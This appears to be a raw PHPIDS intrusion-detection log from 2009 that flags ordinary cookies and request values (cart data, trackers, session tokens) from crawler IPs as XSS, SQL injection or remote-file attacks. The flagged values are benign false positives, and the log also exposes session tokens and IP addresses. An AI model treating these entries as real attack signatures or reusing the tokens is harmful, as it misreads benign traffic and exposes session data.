Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=3283217&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=security%2Fddwrt-csrf-example
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59168
Name:REQUEST.cm__tracker
Value:a:2:{i:0;s:36:"/gallery/entry/2910/venture-visuals/";i:1;s:36:"/gallery/entry/2903/finders-keepers/";}
Page:/i.php?page=security%2Fddwrt-csrf-example
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:32
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59169
Name:REQUEST.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20134
Page:/i.php?page=security%2Fddwrt-csrf-example
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:32
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59170
Name:REQUEST.exp_tracker
Value:a:4:{i:0;s:53:"/weblog/artikel/Wordpress-mit-Readernaut-verheiraten/";i:1;s:55:"/events/detail/childrens-book-sale-september-12th-13th/";i:2;s:18:"/events/detail/p3/";i:3;s:43:"/don-irvine-blog/the-real-bias-is-moderate/";}
Page:/i.php?page=security%2Fddwrt-csrf-example
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:32
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59171
Name:REQUEST.ecm
Value:user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=instoresnow.walmart.com&SiteLanguage=1033
Page:/i.php?page=security%2Fddwrt-csrf-example
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:59172
Name:REQUEST.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=Sat, 07 Nov 2009 18:18:46 GMT
Page:/i.php?page=security%2Fddwrt-csrf-example
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59173
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=2033299&CFTOKEN#=14336522&jsessionid#=30304d576e822d946f6006e40437b6110e4f#lastvisit={ts '2009-11-07 19:50:17'}#timecreated={ts '2009-11-07 11:47:25'}#hitcount=16#cftoken=58611329#cfid=1658835#
Page:/i.php?page=security%2Fddwrt-csrf-example
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59174
Name:COOKIE.language
Value:--
Page:/i.php?page=security%2Fddwrt-csrf-example
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:32
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59175
Name:COOKIE.DB
Value:msRandX=47&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=security%2Fddwrt-csrf-example
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59176
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=3283217&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=security%2Fddwrt-csrf-example
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59177
Name:COOKIE.cm__tracker
Value:a:2:{i:0;s:36:"/gallery/entry/2910/venture-visuals/";i:1;s:36:"/gallery/entry/2903/finders-keepers/";}
Page:/i.php?page=security%2Fddwrt-csrf-example
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:32
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59178
Name:COOKIE.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20134
Page:/i.php?page=security%2Fddwrt-csrf-example
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:32
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59179
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:53:"/weblog/artikel/Wordpress-mit-Readernaut-verheiraten/";i:1;s:55:"/events/detail/childrens-book-sale-september-12th-13th/";i:2;s:18:"/events/detail/p3/";i:3;s:43:"/don-irvine-blog/the-real-bias-is-moderate/";}
Page:/i.php?page=security%2Fddwrt-csrf-example
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:32
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59180
Name:COOKIE.ecm
Value:user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=instoresnow.walmart.com&SiteLanguage=1033
Page:/i.php?page=security%2Fddwrt-csrf-example
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:59181
Name:COOKIE.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=Sat, 07 Nov 2009 18:18:46 GMT
Page:/i.php?page=security%2Fddwrt-csrf-example
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59182
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=2033299&CFTOKEN#=14336522&jsessionid#=30304d576e822d946f6006e40437b6110e4f#lastvisit={ts '2009-11-07 19:50:17'}#timecreated={ts '2009-11-07 11:47:25'}#hitcount=16#cftoken=58611329#cfid=1658835#
Page:/i.php?page=security%2Fddwrt-csrf-example
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59183
Name:REQUEST.PREF
Value:ID=9338396f7462b2fa:TM=1257603647:LM=1257603647:S=355PCtcessSqQ-Q0
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59184
Name:REQUEST._ui-patterns_com_session
Value:BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo SGFzaHsABjoKQHVzZWR7AA==--d732d3aa7f25adf20bd38d79cca6edaa49f9708a
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Impact: 10 | Tags: xss, csrf, id, rfe, lfi
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.125

ID:59185
Name:REQUEST.language
Value:--
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59186
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=3718396&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59187
Name:REQUEST.DB
Value:msRandX=71&ItemDetailsBeta=Y&msProduct=1782427&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150C.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150C.jpg
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59188
Name:REQUEST.cm__tracker
Value:a:1:{i:0;s:27:"/gallery/entry/2919/kasian/";}
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59189
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=2643171&CFTOKEN#=f8ee2f81cb946e11-CEE8623F-B32C-7973-DEDC6429B4206456&jsessionid#=303052041962c030d42a3763231af18f3437#lastvisit={ts '2009-11-07 18:20:08'}#timecreated={ts '2009-11-07 10:17:23'}#hitcount=16#cftoken=f8ee2f81cb946e11-CEE8623F-B32C-7973-DEDC6429B4206456#cfid=2643171#
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59190
Name:REQUEST.ecm
Value:user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.laptopmag.com&SiteLanguage=1033
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:59191
Name:REQUEST.OAGEO
Value:US||||||||||
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects obfuscated JavaScript script injections | Tags: xss, csrf | ID: 25

ID:59192
Name:REQUEST.exp_tracker
Value:a:4:{i:0;s:52:"/news/permalink/opengl-connected-component-labeling/";i:1;s:77:"/site/berichten/20091106_facebook_twitter_en_zune_video_komen_naar_xbox_live/";i:2;s:48:"/site/article/temperatures-for-june-in-victoria/";i:3;s:42:"/blog/brians-panel-at-the-internet-summit/";}
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59193
Name:REQUEST.ci_session
Value:a:4:{s:10:"session_id";s:32:"d202fcbd7ba6e56e5215eeee895d4da3";s:10:"ip_address";s:14:"87.118.122.165";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671883";}42e659d9467337e48020ed4b2d4a9e79
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59194
Name:REQUEST.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 5:20:20 PM
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59195
Name:COOKIE.PREF
Value:ID=9338396f7462b2fa:TM=1257603647:LM=1257603647:S=355PCtcessSqQ-Q0
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59196
Name:COOKIE._ui-patterns_com_session
Value:BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo SGFzaHsABjoKQHVzZWR7AA==--d732d3aa7f25adf20bd38d79cca6edaa49f9708a
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Impact: 10 | Tags: xss, csrf, id, rfe, lfi
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.125

ID:59197
Name:COOKIE.language
Value:--
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59198
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=3718396&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59199
Name:COOKIE.DB
Value:msRandX=71&ItemDetailsBeta=Y&msProduct=1782427&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150C.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150C.jpg
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59200
Name:COOKIE.cm__tracker
Value:a:1:{i:0;s:27:"/gallery/entry/2919/kasian/";}
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59201
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=2643171&CFTOKEN#=f8ee2f81cb946e11-CEE8623F-B32C-7973-DEDC6429B4206456&jsessionid#=303052041962c030d42a3763231af18f3437#lastvisit={ts '2009-11-07 18:20:08'}#timecreated={ts '2009-11-07 10:17:23'}#hitcount=16#cftoken=f8ee2f81cb946e11-CEE8623F-B32C-7973-DEDC6429B4206456#cfid=2643171#
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59202
Name:COOKIE.ecm
Value:user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.laptopmag.com&SiteLanguage=1033
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:59203
Name:COOKIE.OAGEO
Value:US||||||||||
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects obfuscated JavaScript script injections | Tags: xss, csrf | ID: 25

ID:59204
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:52:"/news/permalink/opengl-connected-component-labeling/";i:1;s:77:"/site/berichten/20091106_facebook_twitter_en_zune_video_komen_naar_xbox_live/";i:2;s:48:"/site/article/temperatures-for-june-in-victoria/";i:3;s:42:"/blog/brians-panel-at-the-internet-summit/";}
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59205
Name:COOKIE.ci_session
Value:a:4:{s:10:"session_id";s:32:"d202fcbd7ba6e56e5215eeee895d4da3";s:10:"ip_address";s:14:"87.118.122.165";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671883";}42e659d9467337e48020ed4b2d4a9e79
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59206
Name:COOKIE.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 5:20:20 PM
Page:/i.php?page=videos%2Fpn12%2Flee-baird-john-skinner-jail-get-your-iphone-out-and-try-not-to-get-yourself-in
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59207
Name:REQUEST.PREF
Value:ID=09c17c76509a0f4a:TM=1257597012:LM=1257597012:S=IPVAqwxbzQUnWbHo
Page:/i.php?page=videos%2Fpn12%2Firongeek-hardware-keyloggers-use-review-and-stealth
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59208
Name:REQUEST.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20353
Page:/i.php?page=videos%2Fpn12%2Firongeek-hardware-keyloggers-use-review-and-stealth
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59209
Name:REQUEST.DB
Value:msRandX=46&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2Fpn12%2Firongeek-hardware-keyloggers-use-review-and-stealth
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59210
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=2203982&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fpn12%2Firongeek-hardware-keyloggers-use-review-and-stealth
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59211
Name:REQUEST.cm__tracker
Value:a:1:{i:0;s:27:"/gallery/entry/2918/pulse8/";}
Page:/i.php?page=videos%2Fpn12%2Firongeek-hardware-keyloggers-use-review-and-stealth
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59212
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=12072999&CFTOKEN#=95503253&jsessionid#=3030926fd567a4f251d77b785b61a6f03749#lastvisit={ts '2009-11-07 18:20:06'}#timecreated={ts '2009-11-07 07:03:19'}#hitcount=10#cftoken=26242667#cfid=1647418#
Page:/i.php?page=videos%2Fpn12%2Firongeek-hardware-keyloggers-use-review-and-stealth
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59213
Name:REQUEST.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=Sat, 07 Nov 2009 18:18:35 GMT
Page:/i.php?page=videos%2Fpn12%2Firongeek-hardware-keyloggers-use-review-and-stealth
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59214
Name:REQUEST.exp_tracker
Value:a:4:{i:0;s:54:"/news/permalink/all-about-shadow-volumes-presentation/";i:1;s:52:"/site/article/why-australia-should-not-adopt-an-ets/";i:2;s:72:"/apple/comment/appletell-reviews-the-bookarc-desktop-stand-for-macbooks/";i:3;s:83:"/weblog/artikel/Drei-Abos-warten-Das-Webstandards-Magazin-geht-in-die-zweite-Runde/";}
Page:/i.php?page=videos%2Fpn12%2Firongeek-hardware-keyloggers-use-review-and-stealth
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59215
Name:REQUEST.ci_session
Value:a:4:{s:10:"session_id";s:32:"408fb43b93e16a02874ea901d1b6eb45";s:10:"ip_address";s:12:"78.46.48.164";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671906";}5d6d952fc2b5121dc8db56822d73a180
Page:/i.php?page=videos%2Fpn12%2Firongeek-hardware-keyloggers-use-review-and-stealth
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59216
Name:COOKIE.PREF
Value:ID=09c17c76509a0f4a:TM=1257597012:LM=1257597012:S=IPVAqwxbzQUnWbHo
Page:/i.php?page=videos%2Fpn12%2Firongeek-hardware-keyloggers-use-review-and-stealth
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59217
Name:COOKIE.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20353
